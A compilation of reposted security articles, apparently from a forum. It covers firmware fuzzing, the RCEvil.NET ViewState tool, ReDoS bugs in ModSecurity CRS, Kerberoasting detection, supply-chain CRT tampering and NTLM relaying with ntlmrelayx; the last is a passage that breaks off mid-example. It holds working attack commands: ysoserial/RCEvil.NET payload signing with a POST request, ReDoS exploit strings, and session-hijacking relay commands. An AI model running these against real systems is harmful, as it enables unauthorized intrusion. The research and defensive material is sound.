absolutely insane results: Final fuzzing results After about 24 hours of fuzzing, hardly any new paths were discovered. Doing some more static analysis on the parsing functions revealed very few spots in the functions for any potentially dangerous user input to corrupt anything. $ cat output_fast/fuzzer_stats start_time : 1555381507 last_update : 1555385229 fuzzer_pid : 61241 cycles_done : 272 execs_done : 8226287 execs_per_sec : 2055.33 paths_total : 85 paths_favored : 19 paths_found : 81 paths_imported : 0 max_depth : 6 cur_path : 49 pending_favs : 0 pending_total : 0 variable_paths : 0 stability : 100.00% bitmap_cvg : 1.15% unique_crashes : 0 unique_hangs : 0 last_path : 1555382334 last_crash : 0 last_hang : 0 execs_since_crash : 8226287 exec_timeout : 20 afl_banner : asusdiscovery afl_version : 2.52b target_mode : qemu command_line : afl-fuzz -i afl_input -o output -m none -Q /home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root/usr/sbin/asusdiscovery Final thoughts Over the course of using the LD_PRELOAD trick paired with jumping directly to a function I wanted to fuzz, I was able to save tons of time inside of GDB trying to see what code paths were valid. By using Abiondo's fork of AFL I was able to get execution times on par with AFL compiling code speeds. Getting thousands of executions per second doesn't generally happen when fuzzing applications in AFL's QEMU mode and I was happy to see 2000 plus executions per second. Sursa: https://breaking-bits.gitbook.io/breaking-bits/vulnerability-discovery/reverse-engineering/modern-approaches-toward-embedded-research
-
RCEvil.NET RCEvil.NET is a tool for signing malicious ViewStates with a known validationKey. Any (even empty) ASPX page is a valid target. See http://illuminopi.com/ for full details on the attack vector. Prerequisites Visual Studio Community https://visualstudio.microsoft.com/vs/community/ Local installation of ysoserial.net: https://github.com/pwntester/ysoserial.net Usage Build your payload in ysoserial.net: ysoserial.exe -g TypeConfuseDelegate -f ObjectStateFormatter -o base64 -c "calc.exe" Sign the payload using RCEvil.NET: RCEvil.NET.exe -u [URL] -v [VALIDATION_KEY] -m [DIGEST_TYPE] -p [YSOSERIAL.NET_PAYLOAD] Direct the payload to the target ASPX page Examples Generate base payload in ysoserial.net: ysoserial.exe -g TypeConfuseDelegate -f ObjectStateFormatter -o base64 -c "calc.exe" /wEyxBEAAQAAAP////8... Sign ysoserial.net payload with an HMAC using RCEvil.NET: RCEvil.NET.exe -u /Default.aspx -v 000102030405060708090a0b0c0d0e0f10111213 -m SHA1 -p /wEyxBEAAQAAAP////8... -=[ ViewState Toolset ]=- URL: /Default.aspx Digest Algorithm: SHA1 ValidationKey: 000102030405060708090a0b0c0d0e0f10111213 Modifier: 34030bca -=[ Final Payload ]=- %2fwEyxBEAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAwC... Finally, send the HMAC-signed ViewState payload to the target: POST /Default.aspx HTTP/1.1 Host: 192.168.112.148 Content-Type: application/x-www-form-urlencoded Content-Length: 3072 __VIEWSTATE=%2fwEyxBEAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAwC... Sursa: https://github.com/Illuminopi/RCEvil.NET
-
How I found 5 ReDOS Vulnerabilities in Mod Security CRS Somdev Sangwan Apr 22 This write-up assumes that the reader has intermediate (or higher) knowledge of regular expressions. If you are not very familiar with regular expressions, you might want to check out this tutorial. You may also want to read my introductory article about ReDOS. I have been spending a good amount of time writing ReDOS exploits and studying WAFs lately. To practice my skills in the real world, I chose Mod Security Core Rule Set because it has tons of regular expressions and on top of that, these regular expressions are being used by WAFs in the wild to detect attacks. Two birds with one stone! Well, CRS has 29 configuration files which contain tons of regular expression so it wasn’t possible for me to go through all of them so I decided to automate some part of it. The program I wrote for this purpose isn’t public at the moment because it’s in alpha phase but I am planning to release it soon. Anyways, after extracting potentially vulnerable patterns, I used regex101.com to identify and remove alternate sub-patterns e.g. removing (fine) from ((fine)|(vulnerable)) I also used RegexBuddy to analyze the impact of different exploit approaches and then confirmed the exploits with Python interpreter. Now, let’s talk about the different exploitable sub-patterns I found and how I wrote exploits for them Case #1 Pattern: (?:(?:^[\"'`\\\\]*?[^\"'`]+[\"'`])+|(?:^[\"'`\\\\]*?[\d\"'`]+)+)\s Exploit: """""""""""""" (about 1000 "s) Why this exploit works? Intersecting alternate patterns This pattern consists of two alternate sub-patterns. Both alternate patterns start with ^[\”’`\\\\]*? which causes the regex engine to keep looking for both patterns and hence increasing the permutations. In the second alternate pattern, the tokens [\”’`\\\\]*? and [\d\”’`]+ intersect and both of them match “, ‘ and `. Nested repetition operators The structure of this subpattern is ((pattern 1)+|(pattern 2)+)+ and it’s clear that it’s using nested repetition operators which dramatically increases the complexity. Case #2 Pattern: for(?:/[dflr].*)* %+[^ ]+ in\(.*\)\s?do Vulnerable part: for(?:/[dflr].*)* % Exploit: for/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r Why this exploit works? Let’s take a look at how the string is matched, step by step f fo for for/ for/r for/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r The last match is matched by .* but the the pattern fails to match our exploit string completely because our string doesn’t have % in the end but that’s what the pattern wants to match. In the hopes of matching, it goes one step backward for/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/ But it still doesn’t match. You must be thinking that it would go one more step backwards and keep doing that until it reaches the end and realizes it doesn’t match. Well, you are not wrong but a repetition operator applied over another repetition operator makes things more complex. The fact that /r can be matched by both .* and /[dflr] makes things even worse. I am not sure how much steps it goes through before failing but RegexBuddy4 has a limit of 10,00,000 steps so we don’t really know. Case #3 Pattern: (?:\s|/\*.*\*/|//.*|#.*)*\(.*\) Exploit: ################################################ Why this exploit works? (?:\s|/\*.*\*/|//.*|#.*)* this part of the pattern consists of 4 alternate patterns and 3 of them have the good old .* which can match anything. When the regex engine compares the pattern against the string, the only part which matches is the last one but because there’s no () as required by the pattern, it fails to match and the regex engine goes nuts because there are nested repetition operators placed in such a way that adding a # to the string makes the number of steps to be tried grow exponentially. The last case was found in 3 different rules so that explains why I discussed only 3 cases. Following CVE IDs were assigned to the vulnerabilities: CVE-2019–11387 CVE-2019–11388 CVE-2019–11389 CVE-2019–11390 CVE-2019–11391 It sucks how Medium doesn’t let you set a featured image without adding it to the article itself. Sursa: https://medium.com/@somdevsangwan/how-i-found-5-redos-vulnerabilities-in-mod-security-crs-ce8474877e6e?sk=c64852245215d6fead387acbd394b7db
-
Detecting LDAP based Kerberoasting with Azure ATP In a typical Kerberoasting attack, attackers exploit LDAP vulnerabilities to generate a list of all user accounts with a Kerberos Service Principal Name (SPN) available. Once successful at listing these accounts, attackers grant Kerberos Service Tickets for each user account with an SPN and later perform offline Brute Force on the encrypted part of the Kerberos tickets. This action helps attackers locate a password that belongs to a domain account. Domain account passwords enable attackers to freely move laterally in your domain. Environments where the Kerberos Ticket Granting Service (TGS) is encrypted with a weak cipher, and the cipher is generated from a well-known password (not randomly generated) are prime targets for successful brute force attacks of this type. The following attack logic is often used to find an organization's weakest link and perform LDAP based Kerberoast attacks. Figure 1-Typical Kerberoasting attack flow Typical LDAP based Kerberoasting attack flow and result: Step 1: Identify In this attack phase, attackers are using LDAP to query and locate all user accounts with a Service Principal Name (SPN). Running this LDAP query is possible for all user accounts in a domain. Figure 2- LDAP query that looks for all user accounts with a SPN set Step 2: Enumerate In this phase of the attack, a request is made for Kerberos TGS to the SPN using a valid TGT. Figure 3- TGS request to ExampleService of user1 by user2 Figure 4 - TGS response with ticket to ExampleService of user1 Step 3: Brute force In the brute force phase of the attack, by using commonly available password cracking tools on accounts with commonly used passwords, attackers easily succeed at obtaining the password. In the following example, a commonly used password cracking tool, JohnTheRipper, performs a successful brute force using a rainbow table. Figure 5 - Cracked password using a rainbow table Step 4: Attack In cases where the attempted brute force attack (shown previously) is successful, attackers use the newly obtained clear-text password to login to remote machines or access cloud resources and files. Figure 6 - Interactive clear-text logon How can you detect and prevent Kerberoast attacks from succeeding? Azure Advanced Threat Protection (Azure ATP) has risen to the Kerberoasting challenge and developed new methods to detect when malicious actors are attempting to perform LDAP based reconnaissance on your domain. While this type of attack is difficult to detect, and LDAP’s extensive query language presented additional challenges, our security research work involved differentiating legitimate workflows from malicious behavior and surfacing all related activities and entities. Our newest security alert involves smart behavioral detection backed by extensive machine learning, designed to raise an alert when any type of abnormal enumeration (including SPN enumeration), or queries on sensitive security groups are detected. Starting from v2.72, Azure ATP issues a Security principal reconnaissance (LDAP) alert when the first stage of a Kerberoasting attack attempt is detected on the domains we monitor. Each alert includes vital information for use in your investigation and remediation: 1. Identification of malicious activity 2. Attempted enumeration details and specifics 3. Historical comparisons and activity correlation 4. Suggestion remediation steps The following workflow explains how to use Azure ATP alerts to detect and remediate Kerberoasting attempts on your domain. Step 1: Review the alert to identify the actors and entities involved. Figure 7 - Azure ATP alert on suspicious enumerations Step 2: Filter activities to review resource access on the entity involved Figure 8 - Filter for resource access activities on Client1's profile Step 3: Use the filter results to investigate the resource access activities Figure 9 - Investigate the resource access activity (generated by Kerberos Ticket Granting Service) for ExampleService/User1 Step 4: Filter Interactive logon and Credential validation for the accessed entity Figure 10 - Filter Interactive logon and Credential validation on User1’s profile Step 5: Review logon and access attempts Figure 11 - User1's clear text password was used to logon on interactively on Client2 Step 6: Remediate possible risks Force a password reset on the compromised account Require use of long and complex passwords for users with service principal accounts https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/minimum... Replace the user account by Group Managed Service Account (gMSA) https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-manage... Kerberoasting remains a popular attack method and heavily discussed security issue, but the effects of a successful Kerberoasting attack are real. Make sure your security team is aware of common Kerberoasting risks and strategies, along with the tools and alerts Azure ATP offers to help protect your domain. As always, we welcome your feedback about our work, and are interested in learning more about the security threats and risks you encounter. For more information about features and threat protection, or to learn how we can help, contact us. Get Started Today If you are just starting your journey, begin trials of the Microsoft Threat Protection services today to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace: Windows Defender ATP trial Office 365 E5 trial Enterprise Mobility Suite (EMS) E5 trial Azure Security Center trial Sursa: https://techcommunity.microsoft.com/t5/Enterprise-Mobility-Security/Detecting-LDAP-based-Kerberoasting-with-Azure-ATP/ba-p/462448
-
Analyzing C/C++ Runtime Library Code Tampering in Software Supply Chain Attacks Posted on:April 22, 2019 at 7:30 am Posted in:Malware Author: Trend Micro By Mohamad Mokbel For the past few years, the security industry’s very backbone — its key software and server components — has been the subject of numerous attacks through cybercriminals’ various works of compromise and modifications. Such attacks involve the original software’s being compromised via malicious tampering of its source code, its update server, or in some cases, both. In either case, the intention is to always get into the network or a host of a targeted entity in a highly inconspicuous fashion — which is known as a supply chain attack. Depending on the attacker’s technical capabilities and stealth motivation, the methods used in the malicious modification of the compromised software vary in sophistication and astuteness. Four major methods have been observed in the wild: The injection of malicious code at the source code level of the compromised software, for native or interpreted/just-in-time compilation-based languages such as C/++, Java, and .NET. The injection of malicious code inside C/C++ compiler runtime (CRT) libraries, e.g., poisoning of specific C runtime functions. Other less intrusive methods, which include the compromise of the update server such that instead of deploying a benign updated version, it serves a malicious implant. This malicious implant can come from the same compromised download server or from another completely separate server that is under the attacker’s control. The repackaging of legitimate software with a malicious implant. Such trojanized software is either hosted on the official yet compromised website of a software company or spread via BitTorrent or other similar hosting zones. This blog post will explore and attempt to map multiple known supply chain attack incidents that have happened in the last decade through the four methods listed above. The focus will be on Method 2, whereby a list of all poisoned C/C++ runtime functions will be provided, each mapped to its unique malware family. Furthermore, the ShadowPad incident is taken as a test case, documenting how such poisoning happens. Methods 1 and 2 stand out from the other methods because of the nature of their operation, which is the intrusive and more subtle tampering of code — they are a category in their own right. However, Method 2 is far more insidious since any tampering in the code is not visible to the developer or any source code parser; the malicious code is introduced at the time of compilation/linking. Examples of attacks that used a combination of Methods 1 and 3 are: The trojanization of MediaGet, a BitTorrent client, via a poisoned update (mid-February 2018). The change employed involved a malicious update component and a trojanized copy of the file mediaget.exe. The Nyetya/MeDoc attack on M.E.Doc, an accounting software by Intellect Service, which delivered the destructive ransomware Nyetya/NotPetya by manipulating its update system (April 2017). The change employed involved backdooring of the .NET module ZvitPublishedObjects.dll. The KingSlayer attack on EventID, which resulted in the compromise of the Windows Event Log Analyzer software’s source code (service executable in .NET) and update server (March 2015). An example of an attack that solely made use of Method 3 is the Monju incident, which involved the compromise of the update server for the media player GOM Player by GOMLab and resulted in the distribution of a variant of Gh0st RAT toward specific targets (December 2013). For Method 4, we have the Havex incidents, which involved the compromise of multiple industrial control system (ICS) websites and software installers (different dates in 2013 and 2014). Examples of attacks that used a combination of Methods 2 and 3 are: Operation ShadowHammer, which involved the compromise of a computer vendor’s update server to target an unknown set of users based on their network adapters’ media access control (MAC) addresses (June 2018). The change employed involved a malicious update component. An attack on the gaming industry (Winnti.A), which involved the compromise of three gaming companies and the backdooring of their respective main executables (publicized in March 2019). The CCleaner case, which involved the compromise of Piriform, resulting in the backdooring of the CCleaner software (August 2017). The ShadowPad case, which involved the compromise of NetSarang Computer, Inc., resulting in the backdooring of all of the company’s products (July 2017). The change employed involved malicious code that was injected into the library nssock2.dll, which was used by all of the company’s products. Methods 2 and 3 were also used by the Winnti group, which targeted the online video game industry, compromising multiple companies’ update servers in an attempt to spread malicious implants or libraries using the AheadLib tool (2011). Another example is the XcodeGhost incident (September 2015), in which Apple’s Xcode integrated development environment (IDE) and the compiler’s CoreServices Mach-O object file were modified to include malware that would infect every iOS app built (via the linker) with the trojanized Xcode IDE. The trojanized version was hosted on multiple Chinese file sharing services, resulting in hundreds of trojanized apps’ landing on the iOS App Store unfettered. An interesting case that shows a different side to the supply chain attack methods is the event-stream incident (November 2018). Event-stream is one of the widely used packages by npm (Node.js package manager), a package manager for the JavaScript programming language. A package known as flatmap-stream was added as a direct dependency to the event-stream package. The original author/maintainer of the event-stream package delegated publishing rights to another person, who then added the malicious flatmap-stream package. This malicious package targeted specific developers working on the release build scripts of the bitcoin wallet app Copay, all for the purpose of stealing bitcoins. The malicious code got written into the app when the build scripts were executed, thereby adding another layer of covertness. In most supply chain attack cases that have been happening for almost a decade, the initial infection vector is unknown or at least not publicly documented. Moreover, the particulars of how the malicious code gets injected into the benign software codebase are not documented either, whether from a forensics or a tactics, techniques, and procedures (TTP) standpoint. However, we will attempt to show how Method 2, which employs sophisticated tampering of code and is harder to detect, is used by attackers in a supply chain attack, using the ShadowPad case as our sample for analysis. An In-Depth Analysis of Method 2 – Case Study: ShadowPad There are subtle differences and observations between tampering with the original source code, as in Method 1, and tampering with the C/C++ runtime libraries, as in Method 2. Depending on the nature and location of the changes, the former might be easier to spot, whereas the latter would be much harder to detect if no file monitoring and integrity checks had been in place. All of the reported cases where the C/C++ runtime time libraries are poisoned or modified are for Windows binaries. Each case has been statically compiled with the Microsoft Visual C/C++ compiler with varying linker versions. Additionally, all of the poisoned functions are not part of the actual C/C++ standard libraries, but are specific to Microsoft Visual C/C++ compiler runtime initialization routines. Table 1 shows the list of all known malware families with their tampered runtime functions. Malware Family Poisoned Microsoft Visual C/C++ Runtime Functions ShadowHammer __crtExitProcess(UINT uExitCode) // exits the process. Checks if it’s part of a managed app // it is a CRT wrapper for ExitProcess Gaming industry (HackedApp.Winnti.A) __scrt_common_main_seh(void) // entrypoint of the c runtime library (_mainCRTStartup) with support for structured exception handling which calls the program’s main() function CCleaner Stage 1: __scrt_common_main_seh(void) Stage 2 -> dropped(32- bit) _security_init_cookie() Stage 2 -> dropped (64- bit) _security_init_cookie() void __security_init_cookie(void); // Initializes the global security cookie // used for buffer overflow protection ShadowPad _initterm(_PVFV * pfbegin, _PVFV * pfend); // call entries in function pointer table // The entry (0x1000E600) is the malicious one Table 1. List of poisoned/modified Microsoft Visual CRT functions in supply chain attacks It’s the linker’s responsibility to include the necessary CRT library for providing the startup code. However, a different CRT library could be specified via an explicit linker flag. Otherwise, the default statically linked CRT library libcmt.lib, or another, is used. The startup code performs various environment setup operations prior to executing the program’s main() function. Such operations include exception handling, thread data initialization, program termination, and cookie initialization. It’s important to note that the CRT implementation is compiler-, compiler option-, compiler version-, and platform-specific. Microsoft used to ship the Visual C runtime library headers and compilation files that developers could build themselves. For example, for Visual Studio 2010, such headers would exist under “Microsoft Visual Studio 10.0\VC\crt”, and the actual implementation of the ShadowPad poisoned function _initterm() would reside inside the file crt0dat.c as follows (all comments were omitted for readability purposes): This internal function is responsible for walking a table of function pointers (skipping null entries) and initializing them. It’s called only during the initialization of a C++ program. The poisoned DLL nssock2.dll is written in the C++ language. The argument pfbegin points to the first valid entry on the table, while pfend points to the last valid entry. The definition of the function type _PVFV is inside the CRT file internal.h: The above function is defined in the crt0dat.c file. The object file crt0dat.obj resides inside the library file libcmt.lib. Figure 1 shows ShadowPad’s implementation of _initterm(). Figure 1. ShadowPad poisoned _initterm() runtime function Figure 2 shows the function pointer table for ShadowPad’s _initterm() function as pointed to by pfbegin and pfend. This table is used for constructing objects at the beginning of the program particularly for calling C++ constructors, which is what’s happening in the screenshot below. Figure 2. Function pointer table for ShadowPad poisoned _initterm() runtime function As shown in Figure 2, the function pointer entry labeled malicious_code at the virtual address 0x1000F6A0 has been poisoned to point to a malicious code (0x1000E600). It’s more accurate to say that it is the function pointer table that was poisoned rather than the function _initterm(). Figure 3 shows the cross-reference graph of the _initterm() CRT function as referenced by the compiled ShadowPad code. The graph shows all call paths (reachability) that lead to it, and all other calls it makes itself. The actual call path that leads to executing the ShadowPad code is: DllEntryPoint() -> __DllmainCRTStartup() -> _CRT_INIT() -> _initterm() -> __imp_initterm() -> malicious_code() via function pointer table. Figure 3. Call cross-reference graph for ShadowPad poisoned _initterm() runtime function Note that the internal function _initterm() is called from within the CRT initialization function __CRT_INIT(), which is responsible for C++ DLL initialization and has the following prototype: One of its responsibilities is invoking the C++ constructors for the C++ code in the DLL nssock2.dll, as demonstrated earlier. The said function is implemented inside the CRT file crtdll.c -> object file crtdll.obj -> library file msvcrt.lib. The following code snippet shows the actual implementation of the function _CRT_INIT(). So, how could an attacker poison any of those CRT functions? It’s possible to overwrite the original benign libcmt.lib/msvcrt.lib library with a malicious one, or modify the linker flag such that it points to a malicious library file. Another possibility is by hijacking the linking process such that as the linker is resolving all references to various functions, the attacker’s tool monitors this process, intercepts it, and feeds it a poisoned function definition instead. The backdooring of the compiler’s key executables, such as the linker binary itself, can be another stealthy poisoning vector. Conclusion Although the attacks for Method 2 are very low in number, difficult to predict, and possibly targeted, when one takes place, it can be likened to a black swan event: It will catch victims off guard and its impact will be widespread and catastrophic. Tampering with CRT library functions in supply chain attacks is a real threat that requires further attention from the security community, especially when it comes to the verification and validation of the integrity of development and build environments. Steps could be taken to ensure clean software development and build environments. Maintaining and cross-validating the integrity of the source code and all compiler libraries and binaries are good starting points. The use of third-party libraries and code must be vetted and scanned for any malicious indicators prior to integration and deployment. Proper network segmentation is also essential for separating critical assets in the build and distribution (update servers) environments from the rest of the network. Important as well is the enforcement of very strict access with multifactor authentication to the release build servers and endpoints. Of course, these steps do not exclude or relinquish the developers themselves from the responsibility of continuously monitoring the security of their systems. Sursa: https://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks/
-
The security features of modern PC hardware are enabling new trust boundaries and attack resistance capabilities unparalleled in software alone. These hardware capabilities help to improve resistance to a wide range of attacks including physical attacks against DMA and disk encryption, kernel and remote code exploits, and even application isolation through virtualization. In this talk, we will review the metamorphosis and fundamental re-architecture of Windows to take advantage of emerging hardware security capabilities. We will also examine in-depth the hardware security features provided by vendors such as Intel, AMD, ARM and others, and explain how Windows takes advantage of these features to create new and powerful security boundaries and exploit mitigations. Finally, we will discuss the new attack surface that hardware provides and review exploit case studies, lessons learned, and mitigations for attacks that target PC hardware and firmware. Speaker Bio: David Weston is a group manager in the Windows team at Microsoft, where he currently leads the Windows Device Security and Offensive Security Research teams. David has been at Microsoft working on penetration testing, threat intelligence, platform mitigation design, and offensive security research since Windows 7. He has previously presented at security conferences such as Blackhat, CanSecWest and DefCon.
-
Playing with Relayed Credentials June 27, 2018 Home Blogs Playing with Relayed Credentials During penetration testing exercises, the ability to make a victim connect to an attacker’s controlled host provides an interesting approach for compromising systems. Such connections could be a consequence of tricking a victim into connecting to us (yes, we act as the attackers ) by means of a Phishing email or, by means of different techniques with the goal of redirecting traffic (e.g. ARP Poisoning, IPv6 SLAAC, etc.). In both situations, the attacker will have a connection coming from the victim that he can play with. In particular, we will cover our implementation of an attack that involves using victims’ connections in a way that would allow the attacker to impersonate them against a target server of his choice - assuming the underlying authentication protocol used is NT LAN Manager (NTLM). General NTLM Relay Concepts The oldest implementation of this type of attack, previously called SMB Relay, goes back to 2001 by Sir Dystic of Cult of The Dead Cow- who only focused on SMB connections – although, he used nice tricks especially when launched from Windows machines where some ports are locked by the kernel. I won’t go into details on how this attack works, since there is a lot of literature about it (e.g. here) and an endless number of implementations (e.g. here and here). However, it is important to highlight that this attack is not related to a specific application layer protocol (e.g. SMB) but is in fact an issue with the NT LAN Manager Authentication Protocol (defined here). There are two flavors for this attack: Relay Credentials to the victim machine (a.k.a. Credential Reflection): In theory, fixed by Microsoft starting with MS08-068 and then extended to other protocols. There is an interesting thread here that attempts to cover this topic. Relay Credentials to a third-party host (a.k.a. Credential Relaying): Still widely used, with no specific patch available since this is basically an authentication protocol flaw. There are effective workarounds that could help against this issue (e.g. packet signing) only if the network protocol used supports it. There were, however, some attacks against this protection as well (e.g. CVE-2015-0005). In a nutshell, we could abstract the attack to the NTLM protocol, regardless of the underlying application layer protocol used, as illustrated here (representing the second flavor described above): Over the years, there were some open source solutions that extended the original SMB attack to other protocols (a.k.a. cross-protocol relaying). A few years ago, Dirk-Jan Mollema extended the impacket’s original smbrelayx.py implementation into a tool that could target other protocols as well. We decided to call it ntlmrelayx.py and since then, new protocols to relay against have been added: SMB / SMB2 LDAP MS-SQL IMAP/IMAPs HTTP/HTTPs SMTP I won’t go into details on the specific attacks that can be done, since again, there are already excellent explanations out there (e.g. here and here ). Something important to mention here is that the original use case for ntlmrelayx.py was basically a one-shot attack, meaning that whenever we could catch a connection, an action (or attack) would be triggered using the successfully relayed authentication data (e.g. create a user through LDAP, download a specific HTTP page, etc.). Nevertheless, amazing attacks were implemented as part of this approach (e.g. ACL privilege escalation as explained here). Also, initially, most of the attacks only worked for those credentials that had Administrative privileges, although over time we realized there were more possible use cases targeting regular users. These two things, along with an excellent presentation at DEFCON 20 motivated me into extending the use cases into something different. Value every session, use it, and reuse it at will When you’re attacking networks, if you can intercept a connection or attract a victim to you, you really want to take full advantage of it, regardless of the privileges of that victim’s account. The higher the better of course, but you never know the attack paths to your objectives until you test different approaches. With all this in mind, coupled with the awesome work done on ZackAttack , it was clear that there could be an extension to ntlmrelayx.py that would strive to: Try to keep it open as long as possible once the authentication data is successfully relayed Allow these sessions to be used multiple times (sometimes even concurrently) Relay any account, regardless of its privilege at the target system Relay to any possible protocol supporting NTLM and provide a way that would be easy to add new ones Based on these assumptions I decided to re-architect ntlmrelayx.py to support these scenarios. The following diagram describes a high-level view of it: We always start with a victim connecting to any of our Relay Servers which are servers that implement support for NTLM as the authentication mechanism. At the moment, we have two Relay Servers, one for HTTP/s and another one for SMB (v1 and v2+), although there could be more (e.g. RPC, LDAP, etc.). These servers know little about both the victim and target. The most important part of these servers is to implement a specific application layer protocol (in the context of a server) and engage the victim into the NTLM Authentication process. Once the victim took the bait, the Relay Servers look for a suitable Relay Protocol Client based on the protocol we want to relay credentials to at the target machines (e.g. MSSQL). Let’s say a victim connects to our HTTP Server Relay Server and we want to relay his credentials to the target’s MSSQL service (HTTP->MSSQL). For that to happen, there should be a MSSQL Relay Protocol Client that could establish the communication with the target and relay the credentials obtained by the Relay Server. A Relay Protocol Client plugin knows how to talk a specific protocol (e.g. MSSQL), how to engage into an NTLM authentication using relayed credentials coming from a Relay Server and then keep the connection alive (more on that later). Once a relay attempt worked, each instance of these Protocol Clients will hold a valid session against the target impersonating the victim’s identity. We currently support Protocol Clients for HTTP/s, IMAP/s, LDAP/s, MSSQL, SMB (v1 and 2+) and SMTP, although there could be more! (e.g. POP3, Exchange WS, etc.). At this stage the workflow is twofold: If ntlmrelayx.py is running configured to run one-shot actions, the Relay Server will search for the corresponding Protocol Attack plugin that implements the static attacks offered by the tool. If ntlmrelayx.py is running configured with -socks, not action will be taken, and the authenticated sessions will be hold active, so it can later on be used and reused through a SOCKS proxy. SOCKS Server and SOCKS Relay plugins Let’s say we’re running in -socks mode and we have a bunch of victims that took the bait. In this case we should have a lot of sessions waiting to be used. The way we implemented the use of these involves two main actors: SOCKS Server: A SOCKS 4/5 Server that holds all the sessions and serves them to SOCKS clients. It also tries these sessions to be kept up even if not used. In order to do that, a keepAlive method on every session is called from time to time. This keepalive mechanism is bound to the particular protocol connection relayed (e.g. this is what we do for SMB ). SOCKS Relay Plugin: When a SOCKS client connects to the SOCKS Server, there are some tricks we will need to apply. Since we’re holding connections that are already established (sessions), we will need to trick the SOCKS client that an authentication is happening when, in fact, it’s not. The SOCKS server will also need to know not only the target server the SOCKS client wants to connect against but also the username, so it can verify whether or not there’s an active session for it. If so, then it will need to answer the SOCKS client back successfully (or not) and then tunnel the client thru the session's connection. Finally, whenever the SOCKS client closes the session (which we don’t really want to do since we want to keep these sessions active) we would need to fake those calls as well. Since all these tasks are protocol specific, we’ve created a plugins scheme that would let contributors add more protocols that would run through SOCKS (e.g. Exchange Web Services?). We’re currently supporting tunneling connections through SOCKS for SMB, MSSQL, SMTP, IMAP/S, HTTP/S. With all this information being described, let’s get into some hands-on examples. Examples in Action The best way to understand all of this is through examples, so let’s get to playing with ntlmrelayx.py. First thing you should do is install the latest impacket. I usually play with the dev version but if you want to stay on the safe side, we tagged a new version a few weeks ago. Something important to have in mind (especially for Kali users), is that you have to be sure there is no previous impacket version installed since sometimes the new one will get installed at a different directory and the old one will still be loaded first (check this for help). Always be sure, whenever you run any of the examples that the version banner shown matches the latest version installed. Once everything is installed, the first thing to do is to run ntlmrelayx.py specifying the targets (using the -t or -tf parameters) we want to attack. Targets are now specified in URI syntax, where: Scheme: specifies the protocol to target (e.g. smb, mssql, all) Authority: in the form of domain\username@host:port ( domain\username are optional and not used - yet) Path: optional and only used for specific attacks (e.g. HTTP, when you need to specify a BASE URL) For example, if we specify the target as mssql://10.1.2.10:6969, every time we get a victim connecting to our Relay Servers, ntlmrelayx.py will relay the authentication data to the MSSQL service (port 6969) at the target 10.1.2.10. There’s a special case for all://10.1.2.10. If you specify that target, ntlmrelayx.py will expand that target based on the amount of Protocol Client Plugins available. As of today, that target will get expanded to ‘smb://’, ‘mssql://’, ‘http://’, ‘https://’, ‘imap://’, ‘imaps://’, ‘ldap://’, ‘ldaps://’ and ‘smtp://’, meaning that for every victim connecting to us, each credential will be relayed to those destinations (we will need a victim’s connection for each destination). Finally, after specifying the targets, all we need is to add the -socks parameter and optionally -smb2support (so the SMB Relay Server adds support for SMB2+) and we’re ready to go: # ./ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies [*] Protocol Client SMTP loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client LDAPS loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client MSSQL loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client IMAP loaded.. [*] Running in relay mode to hosts in targetfile [*] SOCKS proxy started. Listening at port 1080 [*] IMAP Socks Plugin loaded.. [*] IMAPS Socks Plugin loaded.. [*] SMTP Socks Plugin loaded.. [*] MSSQL Socks Plugin loaded.. [*] SMB Socks Plugin loaded.. [*] HTTP Socks Plugin loaded.. [*] HTTPS Socks Plugin loaded.. [*] Setting up SMB Server [*] Setting up HTTP Server [*] Servers started, waiting for connections Type help for list of commands ntlmrelayx> And then with the help of Responder, phishing emails sent or other tools, we wait for victims to connect. Every time authentication data is successfully relayed, you will get a message like: [*] Authenticating against smb://192.168.48.38 as VULNERABLE\normaluser3 SUCCEED [*] SOCKS: Adding VULNERABLE/NORMALUSER3@192.168.48.38(445) to active SOCKS connection. Enjoy At any moment, you can get a list of active sessions by typing socks at the ntlmrelayx.py prompt: ntlmrelayx> socks Protocol Target Username Port -------- -------------- ------------------------ ---- SMB 192.168.48.38 VULNERABLE/NORMALUSER3 445 MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 SMB 192.168.48.230 VULNERABLE/ADMINISTRATOR 445 SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 SMTP 192.168.48.224 VULNERABLE/NORMALUSER3 25 SMTP 192.168.48.224 CONTOSO/NORMALUSER1 25 IMAP 192.168.48.224 CONTOSO/NORMALUSER1 143 As can be seen, there are multiple active sessions impersonating different users against different targets/services. These are some of the targets/services specified initially to ntlmrelayx.py using the -tf parameter. In order to use them, for some use cases, we will be using proxychains as our tool to redirect applications through our SOCKS proxy. When using proxychains, be sure to configure it (configuration file located at /etc/proxychains.conf) pointing the host where ntlmrealyx.py is running; the SOCKS port is the default one (1080). You should have something like this in your configuration file: [ProxyList] socks4 192.168.48.1 1080 Let’s start with the easiest example. Let’s use some SMB sessions with Samba’s smbclient. The list of available sessions for SMB are: Protocol Target Username Port -------- -------------- ------------------------ ---- SMB 192.168.48.38 VULNERABLE/NORMALUSER3 445 SMB 192.168.48.230 VULNERABLE/ADMINISTRATOR 445 SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 Let’s say we want to use the CONTOSO/NORMALUSER1 session, we could do something like this: root@kalibeto:~# proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1 ProxyChains-3.1 (http://proxychains.sf.net) WARNING: The "syslog" option is deprecated |S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK Enter 